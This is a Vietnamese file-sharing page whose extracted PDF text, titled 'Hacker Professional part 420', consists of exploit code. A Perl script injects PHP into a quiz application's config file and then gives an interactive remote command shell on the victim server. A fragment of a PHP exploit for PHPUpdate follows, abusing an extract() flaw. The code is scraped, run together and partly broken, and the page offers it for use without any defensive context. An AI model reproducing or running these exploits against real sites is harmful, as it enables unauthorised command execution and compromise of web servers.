Hacker Professional part 420

Chia sẻ: Angel Smile | Ngày: | Loại File: PDF | Số trang:6

Thêm vào BST

Báo xấu

57
lượt xem 6
download

Download Vui lòng tải xuống để xem tài liệu đầy đủ

Tham khảo tài liệu 'hacker professional part 420', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả

Chủ đề:

Bình luận(0) Đăng nhập để gửi bình luận!

Lưu

Nội dung Text: Hacker Professional part 420

my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); die "Connot Connect to $host !" unless($sock); print "\tConnected !\n\nSending Data ....\t"; print $sock "GET $phpinject HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "User-Agent: MorX-Zilla\n"; print $sock "Connection: Close\n\n"; print "\t OK\n\nChecking if code injected ..."; my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); print $sock "GET $injcheck HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "User-Agent: MorX-Zilla\n"; print $sock "Connection: Close\n\n"; while($check = ){ if($check =~ /l3fou/) { $injected = 1; } } if($injected == 1 ){ print "\tSucceded !\n\n\tNOW YOU ARE IN !\n\n"; while(){ print "simo\@morx.org :~\$ "; $cmd = ; chop($cmd); exit(0) if($cmd eq "exit"); $result = get("http://".$host.$path."cfgphpquiz/config.inc.php?morx=$cmd"); print $result;
} } else {print "\tFailed\n\nPHPCode Injection Failed !\n\n";} black_hat_cr(HCE) PHPUpdate
die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i
$parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $port=80; $proxy=""; $cmd=""; for ($i=3; $i
} } if (($path[0]'/') or ($path[strlen($path)-1]'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } srand(make_seed()); $v = rand(111111,999999); /* software site: http://www.php-update.co.uk/ another funny extract() issue, vulnerable code in blog.php: